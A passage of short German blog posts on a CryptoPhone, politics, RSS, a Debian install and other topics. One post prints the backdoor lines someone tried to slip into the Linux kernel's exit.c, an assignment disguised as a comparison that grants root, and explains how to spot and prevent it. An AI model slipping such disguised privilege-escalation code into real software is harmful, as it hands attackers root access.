CryptoPhone

Andy Müller Maguhn und Frank Rieger haben die Idee eines Cryptophones markttauglich gemacht. Herausgekommen ist ein Mobiltelefon dass die derzeit stärkste Verschlüsselung implementiert (details).
Das stark an Trons Cryptophone erinnernde Produkt kostet 1790 Euro, die zugrunde liegende Software wurde auf Windows (ab NT 4.0) portiert und steht demnächst inclusive Sourcecode kostenlos zur Verfügung.
Ich behaupte mal: darauf hat die Welt 5 Jahre lang gewartet. Vielleicht kommt jetzt wieder ein bißchen Bewegung in das Thema abhörsicheres Telefonieren.
Ich weiss selbst, dass man ähnliche Resultate mit Voice Over IP und einem VPN erreichen kann. Es geht aber darum sicheres Telefonieren möglichst einfach zu ermöglichen. So lange der Benutzer mehr machen muss als die Telefonnummer zu wählen, kann man nicht von Massentauglichkeit sprechen.
(Quelle)

Wahnsinn mit System

Das große deutsche Propaganda-Magazin berichtet über den bevorstehenden Bush Besuch in London.
Die Details sprechen mal wieder für sich: “ So wollten die Amerikaner alle U-Bahnen, die unter Gegenden verkehren, in denen sich Bush aufhalten wird, für zwei Tage schließen lassen. Zudem forderten sie diplomatische Immunität für ihre Scharfschützen, falls die jemand erschießen würden. Beides lehnte das britische Innenministerium schließlich ab. Und die Queen weigerte sich, im Buckingham Palast schusssichere Scheiben einbauen zu lassen.“ und “ Das Weiße Haus besteht dagegen darauf, dass das gesamte Regierungsviertel Whitehall und die Umgebung des Buckingham Palasts „sterile“, das heißt demonstrationsfreie, Zonen sein müssten.“.
Jedes Mal wenn ich denke, die Arroganz und Überheblichkeit lässt sich nicht mehr überbieten, werde ich eines besseren belehrt 🙁

Gestern

Gestern bei Anne Clark in der Passionskirche gewesen. In meinem Wortschatz existiert nur ‚Merkwürdig‘ (die positive Version) um das zu umschreiben, deswegen lasse ich es lieber bleiben.

schulligung internezz

Kann nicht bloggen, muss arbeiten 😉

Ein paar Quickies gibt’s trotzdem: Michael Moore ist am Wochenende in Berlin (warum verkauft der Eintrittskarten für sich selbst ?). [tim]
Es ist mal wieder Blogger-Treffen in Berlin. [don]

Ich habe RSS für mich entdeckt und den Feed in meinem Weblog aktiviert (kucken sie mal rechts unten der Knopf da – genau). Leider kommt bei Sunlog nur grütze an, höchste Zeit auf G!Log umzusteigen.
Habe schnell festgestellt dass der Feed von Spiegel.de nicht zu gebrauchen ist, weil jede Änderung an einem Artikel einen neuen Eintrag bewirkt.

Das Erfolgserlebnis gestern war Debian auf einem Firmenrechner zu installieren, d.h. kein CD-ROM in der Kiste und Domänen-Authentifizierung am Proxy. Das grösste Problem war jedoch Disketten aufzutreiben 😉 Dann ging es fix, gebootet, Proxy-Settings richtig eingetragen und fortan via FTP installiert, was besonders an so einer dicken Standleitung Spaß macht.
Der Proxy-String muss btw. so aussehen:
http://domain\user:password@proxy.firma.de:Portnummer/

nice try (oder: links vor rechts)

Ein netter Versuch die Linux-Kernelquellen zu manipulieren ist heute bekannt geworden: in einen CVS Server wurde offensichtlich eingebrochen und versucht diese Zeilen in die Datei kernel/exit.c einzufügen:

  if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

Das diese Manipulation reichlich sinnlos ist, weil die Kernel-Quellen mit Bitkeeper verwaltet werden, war schnell klar. Lediglich um lesenden Zugriff für CVS User zu ermöglichen werden sie regelmäßig auf den CVS-Server exportiert, der Hack fand also am falschen Ende der Einbahnstraße statt.

Interessant ist jedoch der Hack selbst: in der zweiten if-Bedingung wird kein Vergleich (==) sondern eine Zuweisung (=) durchgeführt.

Dem geneigten Programmierer fällt das beim Lesen mitunter nicht auf, es ist auch eine beliebte Fehlerquelle – nicht nur bei Anfängern. Genau aus diesem Grund ist es Gold wert Coding-Guidelines einzuführen, die Konstanten in Vergleichen grundsätzlich links vorschreiben:

  if (0 == current->uid)

Das sieht erstmal gewöhnungsbedürftig aus, der Compiler meckert jedoch sofort bei versehentlichen Zuweisungen. Wird diese Regel konsequent durchgezogen, würden solche Angriffe sofort auffallen, versehentliche Zuweisungen hätten keine Chance.

Interessanter Ansatz

In der Diskussion um die Bündelung von Stromanschluss und Telefon wurde ein interessanter Vorschlag gemacht:

Wer unbedingt von der Telekom Strom haben möchte, so sollte dieser doch einfach den Analoganschluss abgreifen. Je nach Leitungslänge bis zu 50V und 50mA sind möglich. Das hochgerechnet auf 24 Stunden/Woche/Monat/Jahr… …kommt schon was zusammen.

Ich stelle mir jetzt die ganzen Menschen mit viel zu hoher Stromrechnung aufgrund von energieintensiven Pflanzenlampen vor, wie sie an der Telefondose rumlöten und jede Woche über dem Verteiler der Telekom eine Rauchwolke aufsteigt…

Schnick-Schnack-Schnuck

Was sie schon immer über „Schere Stein Papier“ wissen wollten und sich nicht zu fragen trauten: die ganze Wahrheit in Notes from my terminal.

Wie Jens bemerkt hat, gibt es schon einige Aktivitäten im Chaos Congress Wiki für den diesjährigen Congress. Der Veranstaltungsort ist erstmalig das bcc was mir allerdings recht klein erscheint. Es könnte eng werden dieses Jahr… 🙁

Ein Heim für photo::rama

Robert gibt seinen Server auf und damit hängen ein paar Projekte, die er gehostet hat, in der Luft. So auch photo::rama.
Ich habe vorgeschlagen eine Blogger-Genossenschaft zu gründen, in der wir alle einen (virtuellen) Server oder eines dieser Premium XXL-Pakete teilen.
Das würde bedeuten, die teilnehmenden Weblogs ziehen auf diesen Server um (sonst ergibt sich ja kaum eine Kostenersparnis 😉 und aus den geteilten Beträgen wird photo::rama quasi mitfinanziert.
Die dafür notwendige kritische Masse ist sicherlich das kleinste Problem, es muss auch viel administriert werden, sowohl technisch als auch finanziell.
Ideen, Vorschläge sowie Asylangebote sind herzlich willkommen.